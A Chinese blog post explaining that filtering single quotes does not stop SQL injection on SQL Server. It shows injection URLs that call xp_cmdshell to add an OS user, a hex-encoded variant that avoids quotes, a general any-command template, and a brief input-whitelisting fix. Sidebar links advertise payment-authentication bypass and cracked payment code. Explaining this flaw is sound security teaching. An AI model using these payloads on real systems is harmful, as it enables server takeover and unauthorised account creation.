饶过'(单引号)限制继续射入

最新推荐文章于 2024-04-22 22:12:16 发布
最新推荐文章于 2024-04-22 22:12:16 发布
阅读量671 收藏
点赞数
文章标签: sql sql server command user c
  我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:

http://www.ilikeplmm.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--


  这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:

http://www.ilikeplmm.com/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--


  是不是跟上面的那句有很大区别?可是效果完全是一样的。其实这些都是SQL语句。

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400


  这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白,先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:

declare @a sysname
select @a=<command>
exec master.dbo.xp_cmdshell @a


解决办法:

  过滤变量,限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。
lobenton
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入中绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
Sql server注入之注入绕过
qq_42990434的博客
12-17 3438
本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下M
oracle注入过滤了单引号,sql绕过单引号限制继续注入的解决方法
weixin_39547596的博客
04-05 1403
在防范sql注入时,对变量过滤不足甚至没有过滤而构造畸形SQL语句,极有可能被成功注入,比如下面这行sql,相当轻松就注入成功了:代码示例:http://www./show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--大家可能觉得变量过滤了'就可以防止SQL Injection攻击,仅仅过滤'是不够的,在'被过...
mysql 16进制 绕过_SQL注入WAF绕过
weixin_31796803的博客
02-01 770
SQL注入WAF绕过(1)大小写绕过此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。(2)替换关键字这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1...
饶过彩虹非安全认证易支付.zip
10-12
饶过彩虹非安全认证易支付,彩虹云商城限时只能使用认证接口,用这个可绕过认证
饶过防注入系统方法总结.txt
07-18
饶过防注入系统方法总结.txt
初中语文文摘人生世人不知有因果因果何曾饶过
09-09
初中语文文摘人生世人不知有因果因果何曾饶过
彩虹易支付全解最新版.zip
06-08
增加API退款、手动补单、删除订单 增加用户组设置,可以无限添加不同用户组,设置不同费率 增加多通道轮训,可以自定义轮训方式和权重设置 增加风控记录、登陆日志、数据清理 增加实名认证(对接支付宝API) 增加...
源支付Ypay系统V6.9.9稳定最新免授权源码,三平台免挂免签约支付
06-19
源支付Ypay系统V6.9.9稳定最新免授权支付源码,三平台免挂免签约支付。以卓越的系统性能,个性的后台操作,丰富的系统功能,解决个人站长知识付费、运营赞助的难题,全新轻量化的界面UI可提供更加方便快捷的浏览体验,...
绕过D盾,D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
网页上出现D盾拦截
热门推荐
rainjm的博客
10-09 2万+
去除网页上出现的D盾拦截
SQL注入过滤单引号是否无解
u012064609的专栏
12-18 2万+
sql注入攻击能够得逞,往往是因为前台页面传递的参数含有非法字符,导致sql原有逻辑发生改变。如经典的登录验证例子 程序处理:select * from tableXX where username
sqlmap绕过d盾_记一次很迷的绕过D盾的经历
weixin_39949473的博客
12-09 2401
今天上课的时候,无聊的我看着qq中的群聊,突然看到一个学弟说有个存在D盾的站绕不过去,我心想到我展现自己的时候了,互加好友之后,也拿到了站点。一个单引号打过去给我拦截了。被拦截了,也要想办法毕竟不能丢脸,尝试了很多办法都没有绕过。睡着还被老师发现,让我站起来回答问题,啊这,我灵机一动说我趴着听课呢?逃过一劫,但做人不能放弃啊,我下课直接去吃饭了,已经放弃的我打算写作业,然后又想起来那个站...
网络安全——绕过
W981113的博客
01-01 3945
1.编码的问题 http在传输特殊字符时需要在浏览器中编码,常见的比如空格、回车符等 编码是有规定的,但是具体如何编码没有规定,不同浏览器编码方案不一致,不同字段编码方案也不一样 结论:所有浏览器都有编码的习惯,那么后台接收数据时。首先需要处理编码就是解码,解码是把已编码的字符还原,其余未编码的不动。 2.实际测试 当对浏览器的输入区域进行输入字符时会出现两种情况: 1.输入的字段被浏览器自动编码,例如输入空格,浏览器自动编码为%20,传输时http中也是%20形式传输的 2.输入的字段是编码形式,浏览器自
Python + SQLAlchemy操作MySQL数据库(ORM)
上庸者-不服周
04-19 265
SQLAlchemy是用Python编程语言开发的一个开源项目。它提供了SQL工具包和ORM(对象关系映射)工具,使用MIT许可证发行。SQLAlchemy采用简单的Python语言,提供高效和高性能的数据库访问,实现了完整的企业级持久模型。它的理念是SQL数据库的量级和性能比对象集合重要,而对象集合的抽象又重要于表和行。
SQL表连接详解:JOIN与逗号(,)的使用及其性能影响
好好学习日记
04-17 1061
在这个详细的解释中,我们将深入探讨SQL中表连接的概念,特别是JOIN和逗号(,)在连接表时的不同用法及其对查询性能的影响。通过实际示例和背后的逻辑分析,我们将揭示在不同场景下选择哪种连接方式更为合适。
探秘数据库中间件:ProxySQL与MaxScale的优势与劣势
todoitbo的博客
04-22 1081
本文将深入探讨两个流行的数据库负载均衡中间件ProxySQL和MaxScale的功能、特点以及适用场景。我们将比较两者的优劣势,并提供选择和配置的建议,帮助读者了解如何在自己的数据库架构中选择合适的解决方案。
苍穹外卖day10(1)Spring Task、 订单状态定时处理
最新发布
qq_51076441的博客
04-22 462
Spring Task用于在指定时间处理某个业务逻辑,在本项目中体现在订单状态定时处理,包括“下单后未支付(订单超时自动取消)”、“订单一直处于派送中状态(订单需要自动更新成已完成)”。实现的业务逻辑通过当前订单状态和下单时间去查询订单,对于满足上面两个条件的订单,设置一个时间让任务自动执行。Spring框架提供的任务调度工具,可以按照约定的时间自动执行某个代码逻辑。应用场景信用卡每月还款提醒银行贷款每月还款提醒火车票售票系统处理未支付订单入职纪念日为用户发送通知。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值